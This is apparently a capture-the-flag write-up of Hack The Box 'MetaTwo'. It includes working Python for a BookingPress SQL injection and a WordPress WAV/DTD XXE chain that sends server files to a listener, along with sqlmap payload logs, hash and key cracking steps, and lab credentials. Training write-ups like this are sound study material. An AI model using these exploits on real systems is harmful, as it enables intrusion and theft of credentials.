[Original] HTB MetaTwo (easy)

Posted: 2022-12-4 00:41 951

Reference (original write-up): https://0xdedinfosec.vercel.app/blog/hackthebox-metatwo-writeup
Ports 21, 22 and 80 are open.
The site is http://metapress.htb/.
Wappalyzer shows the site's technology stack.
The page source reveals the WordPress plugin in use (BookingPress) and its version.
Searching for vulnerabilities in that plugin version turns up CVE-2022-0739:
https://wpscan.com/vulnerability/388cd42d-b61a-42a4-8604-99b812db2357
The CVE has a public PoC. Following it, the first step is to find the _wpnonce value, because the admin-ajax request will not be processed without it.
Capture the request with Burp and save it as admin.req.
Mark the injectable parameter in admin.req (total_service) and hand the file to sqlmap. sqlmap finds both a time-based blind and a 9-column UNION injection; it uses the UNION technique for extraction, which is why the later runs finish in a second or two.
List all databases.
List the tables of the blog database.
Dump the wp_users table.
Crack the password hash.
The hash cracks to partylikearockstar.
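To make the injection sqlmap found readable without the tool, here is an added example (not code from the original write-up, from sqlmap or from BookingPress) that builds the same admin-ajax request by hand: it locates a nonce in a page, wraps an arbitrary MySQL expression in the marker strings sqlmap used (0x716b787871 / 0x71786a7071 are just "qkxxq" / "qxjpq"), places it in column 2 of the 9-column UNION, and pulls the result back out of the response. The HTML fragment and the JSON response are constructed for the example; the markup around a real nonce and the real response layout may differ.

```python
# Added example, not code from the original write-up or from sqlmap: it
# reproduces by hand the UNION injection sqlmap found in the BookingPress
# admin-ajax endpoint, so the request body and the marker-based extraction
# are visible.  The HTML snippet and the JSON response below are constructed
# for the example, not captured from the box.
import re
from typing import Optional
from urllib.parse import urlencode

AJAX_ACTION = "bookingpress_front_get_category_services"
UNION_COLUMNS = 9                    # sqlmap: "UNION injectable with 9 columns"
PREFIX, SUFFIX = "qkxxq", "qxjpq"    # sqlmap's 0x716b787871 / 0x71786a7071


def hexlit(s: str) -> str:
    """MySQL hex literal (0x...), so the payload needs no quote characters."""
    return "0x" + s.encode().hex()


def find_nonce(html: str) -> Optional[str]:
    """First 10-hex-char WordPress nonce next to a _wpnonce key.
    The markup around the nonce is an assumption; adjust the regex to the page."""
    m = re.search(r'_wpnonce["\']?\s*[:=]\s*["\']?([0-9a-f]{10})\b', html)
    return m.group(1) if m else None


def build_body(sql_expr: str, nonce: str, category_id: int = 33) -> str:
    """Form body for admin-ajax.php with sql_expr injected via total_service.

    The expression goes into column 2 of the UNION (the one the plugin echoes
    back), wrapped in PREFIX/SUFFIX so it can be located in any response
    layout; the closing ')' and '-- -' mirror sqlmap's payload."""
    cols = ["NULL"] * UNION_COLUMNS
    cols[1] = f"CONCAT({hexlit(PREFIX)},{sql_expr},{hexlit(SUFFIX)})"
    payload = f"1) UNION ALL SELECT {','.join(cols)}-- -"
    return urlencode({"action": AJAX_ACTION, "_wpnonce": nonce,
                      "category_id": category_id, "total_service": payload})


def extract(response_text: str) -> list:
    """Every PREFIX...SUFFIX delimited value in the response, in order."""
    pat = re.compile(re.escape(PREFIX) + r"(.*?)" + re.escape(SUFFIX), re.S)
    return pat.findall(response_text)


# Constructed sample input: a page fragment exposing the nonce, and JSON the
# endpoint might return once column 2 is echoed as a service name.
SAMPLE_HTML = 'var bp_vars = {"ajax_url":"/wp-admin/admin-ajax.php","_wpnonce":"73608887bb"};'
SAMPLE_RESPONSE = ('{"variant":"success","response_data":[{"bookingpress_service_id":null,'
                   '"bookingpress_service_name":"' + PREFIX + 'admin,manager' + SUFFIX + '",'
                   '"bookingpress_service_price":null}]}')
USERS_QUERY = "(SELECT GROUP_CONCAT(user_login) FROM wp_users)"

if __name__ == "__main__":
    nonce = find_nonce(SAMPLE_HTML)
    print(build_body(USERS_QUERY, nonce))     # body to POST to /wp-admin/admin-ajax.php
    print(extract(SAMPLE_RESPONSE))           # ['admin,manager']
```

Swap USERS_QUERY for `(SELECT GROUP_CONCAT(user_login,0x3a,user_pass) FROM wp_users)` to get the hashes in one request; the markers are what lets the value be recovered even when the plugin buries it inside a larger JSON structure.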
Brute-force directories.
Log in to wp-admin with the manager account and the recovered password.
Look up vulnerabilities for this WordPress version: CVE-2021-29447 (XXE through the media library's WAV parsing).
https://tryhackme.com/room/wordpresscve202129447
We need to create a WAV file that pulls in a second file, dedsec.dtd, which contains our malicious DTD.
Start a PHP server to host the DTD and receive the callback.
We get /etc/passwd.
Next, read the WordPress wp-config.php.
We obtain the path /var/www/metapress.htb/blog.
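The three pieces of that XXE chain, as an added example that is not code from the original write-up or from any published PoC: the WAV whose iXML chunk carries the DOCTYPE, the dedsec.dtd it fetches, and a decoder for what the server sends back. The listener address (10.10.14.1:8000), the log-line format and the passwd line used as sample data are constructed for the example.

```python
# Added example, not code from the original write-up: builds the pieces of the
# CVE-2021-29447 XXE chain described above (a WAV whose iXML chunk carries the
# DOCTYPE, the external dedsec.dtd it pulls in, and a decoder for the callback)
# so each piece can be inspected offline.  The listener address and the passwd
# line used as sample data are constructed for the example.
import base64
import re
import struct

ATTACKER = "http://10.10.14.1:8000"        # hypothetical listener (php -S)


def build_wav(dtd_url: str) -> bytes:
    """Minimal RIFF/WAVE file whose only chunk is an iXML chunk holding the
    XXE DOCTYPE.  WordPress < 5.7.1 hands that chunk to an XML parser that
    resolves external entities, so %remote; fetches dtd_url and %init;/%trick;
    expand what the DTD defines.  The trailing NUL mirrors the widely
    published PoC for this CVE."""
    xml = ('<?xml version="1.0"?>'
           '<!DOCTYPE ANY['
           f'<!ENTITY % remote SYSTEM "{dtd_url}">'
           '%remote;%init;%trick;]>\x00').encode()
    chunk = b"iXML" + struct.pack("<I", len(xml)) + xml
    if len(xml) % 2:
        chunk += b"\x00"                    # RIFF chunks are padded to even length
    body = b"WAVE" + chunk
    return b"RIFF" + struct.pack("<I", len(body)) + body


def riff_chunks(wav: bytes) -> list:
    """Walk the container and return (chunk_id, data) pairs: a sanity check
    that the file we built is what a RIFF parser will see."""
    assert wav[:4] == b"RIFF" and wav[8:12] == b"WAVE"
    out, pos = [], 12
    while pos + 8 <= len(wav):
        cid = wav[pos:pos + 4]
        size = struct.unpack("<I", wav[pos + 4:pos + 8])[0]
        out.append((cid.decode("ascii"), wav[pos + 8:pos + 8 + size]))
        pos += 8 + size + (size % 2)
    return out


def build_dtd(target_file: str, exfil_url: str) -> str:
    """Contents of dedsec.dtd.  php://filter base64-encodes the file so its
    newlines and special characters survive inside a URL; the nested entity
    (&#x25; is '%' escaped for the DTD) sends it to exfil_url as ?p=..."""
    return (f'<!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource={target_file}">\n'
            f'<!ENTITY % init "<!ENTITY &#x25; trick SYSTEM \'{exfil_url}?p=%file;\'>">\n')


def decode_exfil(log_line: str) -> str:
    """Recover the file from a listener log line containing ?p=<base64>."""
    m = re.search(r"[?&]p=([A-Za-z0-9+/=]+)", log_line)
    if not m:
        raise ValueError("no p= parameter in log line")
    return base64.b64decode(m.group(1)).decode(errors="replace")


# Constructed sample: one passwd line, as the server would send it back.
SAMPLE_PASSWD = "root:x:0:0:root:/root:/bin/bash\n"
SAMPLE_LOG_LINE = ("[Sat Dec  3 08:59:43 2022] 10.10.11.186:41230 [404]: GET /?p="
                   + base64.b64encode(SAMPLE_PASSWD.encode()).decode())

if __name__ == "__main__":
    with open("payload.wav", "wb") as f:
        f.write(build_wav(ATTACKER + "/dedsec.dtd"))
    with open("dedsec.dtd", "w") as f:
        f.write(build_dtd("/etc/passwd", ATTACKER + "/"))
    print(decode_exfil(SAMPLE_LOG_LINE), end="")
```

Serve the directory containing dedsec.dtd with `php -S 0.0.0.0:8000`, upload payload.wav through the media library, and the callback with the base64 body appears in the PHP server's log; for the second step, point build_dtd at /var/www/metapress.htb/blog/wp-config.php instead of /etc/passwd. The DTD has to be external because parameter entity references inside an entity value (%file;) are only expanded in the external subset.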
wp-config.php contains FTP credentials:
Username: metapress.htb
Password: 9NYS_ii@FyL_p5M2NvJ
Over FTP we retrieve send_email.php; reading it gives the jnelson user's password Cb4_JmWM8zUZWMu@Ys.
ssh jnelson@10.10.11.186
We find passpie.
A Google search shows passpie is a command-line password manager written in Python: https://github.com/marcwebbie/passpie
Let's try to crack its key.
Download the key file.
Keep only the private key block.
Convert it to john format with gpg2john.
The passphrase cracks to blink182.
With that passphrase passpie gives up the root password p7qfAZt4_A1xo_0x.
su root
cd ~
cat root.txt
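For the "keep only the private key" step, an added example (not code from the original write-up or from passpie) that isolates the private-key block from a passpie .keys file, which stores the public and private armored blocks back to back in its database directory (~/.passpie by default), and verifies the armor's CRC24 trailer so a mangled copy-paste is caught before john is run against it. The .keys content is constructed here from throwaway bytes, not the key from the box.

```python
# Added example, not code from the original write-up or from passpie: it
# isolates the private-key block from a passpie .keys file (public and private
# armored blocks back to back) and checks the armor's CRC24 trailer before the
# block goes to gpg2john.  SAMPLE_KEYS is built here from throwaway bytes; it
# is not the key from the box.
import base64
import binascii
import re

ARMOR_RE = re.compile(r"-----BEGIN PGP (?P<kind>[A-Z ]+)-----\n(?P<body>.*?)"
                      r"-----END PGP (?P=kind)-----", re.S)


def crc24(data: bytes) -> int:
    """OpenPGP armor checksum, RFC 4880 section 6.1 (init 0xB704CE, poly 0x1864CFB)."""
    crc = 0xB704CE
    for byte in data:
        crc ^= byte << 16
        for _ in range(8):
            crc <<= 1
            if crc & 0x1000000:
                crc ^= 0x1864CFB
    return crc & 0xFFFFFF


def armor_blocks(text: str) -> dict:
    """Map armor kind ('PRIVATE KEY BLOCK', ...) to the complete armored text."""
    return {m.group("kind"): m.group(0) for m in ARMOR_RE.finditer(text)}


def armor_valid(block: str) -> bool:
    """True when the base64 body decodes and matches the '=XXXX' CRC24 line."""
    lines = block.strip().splitlines()[1:-1]           # drop BEGIN/END lines
    if "" in lines:                                    # skip 'Version:'-style headers
        lines = lines[lines.index("") + 1:]
    if not lines or not lines[-1].startswith("="):
        return False
    try:
        raw = base64.b64decode("".join(lines[:-1]), validate=True)
        trailer = base64.b64decode(lines[-1][1:], validate=True)
    except (binascii.Error, ValueError):
        return False
    return trailer == crc24(raw).to_bytes(3, "big")


def extract_private_key(keys_text: str) -> str:
    """The armored private key, verified; save it and run: gpg2john key.asc > hash"""
    block = armor_blocks(keys_text).get("PRIVATE KEY BLOCK")
    if block is None:
        raise ValueError("no PGP private key block found")
    if not armor_valid(block):
        raise ValueError("private key armor is corrupt (CRC24 mismatch)")
    return block


def armor(kind: str, raw: bytes) -> str:
    """Wrap bytes in ASCII armor; used only to construct the sample below."""
    b64 = base64.b64encode(raw).decode()
    body = "\n".join(b64[i:i + 64] for i in range(0, len(b64), 64))
    crc = base64.b64encode(crc24(raw).to_bytes(3, "big")).decode()
    return f"-----BEGIN PGP {kind}-----\n\n{body}\n={crc}\n-----END PGP {kind}-----"


# Constructed .keys content: two armored blocks around throwaway payloads.
SAMPLE_KEYS = (armor("PUBLIC KEY BLOCK", bytes(range(64))) + "\n"
               + armor("PRIVATE KEY BLOCK", bytes(range(255, 127, -1))) + "\n")

if __name__ == "__main__":
    print(extract_private_key(SAMPLE_KEYS))
```

Pipe the printed block into a file, run gpg2john on it and feed the hash to john with a wordlist; once the passphrase is known, `passpie export` (or `passpie copy`) decrypts the stored credentials with it.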
admin.req:

POST /wp-admin/admin-ajax.php HTTP/1.1
Host: metapress.htb
User-Agent: curl/7.84.0
Accept: */*
Content-Length: 185
Content-Type: application/x-www-form-urlencoded
Connection: close

action=bookingpress_front_get_category_services&_wpnonce=73608887bb&category_id=33&total_service=1
$ sqlmap -r admin.req -p total_service --batch
[*] starting @ 08:54:24 /2022-12-03/

[08:54:24] [INFO] parsing HTTP request from 'admin.req'
[08:54:25] [INFO] testing connection to the target URL
[08:54:28] [INFO] checking if the target is protected by some kind of WAF/IPS
[08:54:29] [INFO] testing if the target URL content is stable
[08:54:30] [INFO] target URL content is stable
[08:54:31] [WARNING] heuristic (basic) test shows that POST parameter 'total_service' might not be injectable
[08:54:33] [INFO] testing for SQL injection on POST parameter 'total_service'
[08:54:33] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[08:54:39] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[08:54:41] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[08:54:46] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[08:54:52] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN)'
[08:54:58] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[08:55:04] [INFO] testing 'Generic inline queries'
[08:55:05] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[08:55:05] [WARNING] time-based comparison requires larger statistical model, please wait. (done)
[08:55:12] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[08:55:18] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[08:55:23] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[08:55:36] [INFO] POST parameter 'total_service' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] Y
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] Y
[08:55:36] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[08:55:36] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[08:56:06] [INFO] target URL appears to be UNION injectable with 9 columns
[08:56:12] [INFO] POST parameter 'total_service' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable
POST parameter 'total_service' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection point(s) with a total of 68 HTTP(s) requests:
---
Parameter: total_service (POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: action=bookingpress_front_get_category_services&_wpnonce=73608887bb&category_id=33&total_service=1) AND (SELECT 9646 FROM (SELECT(SLEEP(5)))LdKc) AND (6557=6557

    Type: UNION query
    Title: Generic UNION query (NULL) - 9 columns
    Payload: action=bookingpress_front_get_category_services&_wpnonce=73608887bb&category_id=33&total_service=1) UNION ALL SELECT NULL,CONCAT(0x716b787871,0x4b614a6e69454e444a727549686572497163796b646b6b6a4a4854527562474e6f4b576e5a505177,0x71786a7071),NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -
---
[08:56:12] [INFO] the back-end DBMS is MySQL
web application technology: Nginx 1.18.0, PHP 8.0.24
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
[08:56:13] [INFO] fetched data logged to text files under '/home/xxx/.local/share/sqlmap/output/metapress.htb'

[*] ending @ 08:56:13 /2022-12-03/
$ sqlmap -r admin.req -p total_service --dbs
[*] starting @ 08:56:32 /2022-12-03/

[08:56:32] [INFO] parsing HTTP request from 'admin.req'
[08:56:32] [INFO] resuming back-end DBMS 'mysql'
[08:56:32] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: total_service (POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: action=bookingpress_front_get_category_services&_wpnonce=73608887bb&category_id=33&total_service=1) AND (SELECT 9646 FROM (SELECT(SLEEP(5)))LdKc) AND (6557=6557

    Type: UNION query
    Title: Generic UNION query (NULL) - 9 columns
    Payload: action=bookingpress_front_get_category_services&_wpnonce=73608887bb&category_id=33&total_service=1) UNION ALL SELECT NULL,CONCAT(0x716b787871,0x4b614a6e69454e444a727549686572497163796b646b6b6a4a4854527562474e6f4b576e5a505177,0x71786a7071),NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -
---
[08:56:33] [INFO] the back-end DBMS is MySQL
web application technology: Nginx 1.18.0, PHP 8.0.24
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
[08:56:33] [INFO] fetching database names
available databases [2]:
[*] blog
[*] information_schema

[08:56:34] [INFO] fetched data logged to text files under '/home/xxx/.local/share/sqlmap/output/metapress.htb'

[*] ending @ 08:56:34 /2022-12-03/
$ sqlmap -r admin.req -p total_service -D blog --tables
[*] starting @ 08:59:43 /2022-12-03/

[08:59:43] [INFO] parsing HTTP request from 'admin.req'
[08:59:43] [INFO] resuming back-end DBMS 'mysql'
[08:59:43] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: total_service (POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: action=bookingpress_front_get_category_services&_wpnonce=73608887bb&category_id=33&total_service=1) AND (SELECT 9646 FROM (SELECT(SLEEP(5)))LdKc) AND (6557=6557

    Type: UNION query
    Title: Generic UNION query (NULL) - 9 columns
    Payload: action=bookingpress_front_get_category_services&_wpnonce=73608887bb&category_id=33&total_service=1) UNION ALL SELECT NULL,CONCAT(0x716b787871,0x4b614a6e69454e444a727549686572497163796b646b6b6a4a4854527562474e6f4b576e5a505177,0x71786a7071),NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -
---
[08:59:45] [INFO] the back-end DBMS is MySQL
web application technology: Nginx 1.18.0, PHP 8.0.24
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
[08:59:45] [INFO] fetching tables for database: 'blog'
Database: blog
[27 tables]
+--------------------------------------+
| wp_bookingpress_appointment_bookings |
| wp_bookingpress_categories           |
| wp_bookingpress_customers            |
| wp_bookingpress_customers_meta       |
| wp_bookingpress_customize_settings   |
| wp_bookingpress_debug_payment_log    |
| wp_bookingpress_default_daysoff      |
| wp_bookingpress_default_workhours    |
| wp_bookingpress_entries              |
| wp_bookingpress_form_fields          |
| wp_bookingpress_notifications        |
| wp_bookingpress_payment_logs         |
| wp_bookingpress_services             |
| wp_bookingpress_servicesmeta         |
| wp_bookingpress_settings             |
| wp_commentmeta                       |
| wp_comments                          |
| wp_links                             |
| wp_options                           |
| wp_postmeta                          |
| wp_posts                             |
| wp_term_relationships                |
| wp_term_taxonomy                     |
| wp_termmeta                          |
| wp_terms                             |
| wp_usermeta                          |
| wp_users                             |
+--------------------------------------+

[08:59:47] [INFO] fetched data logged to text files under '/home/xxx/.local/share/sqlmap/output/metapress.htb'

[*] ending @ 08:59:47 /2022-12-03/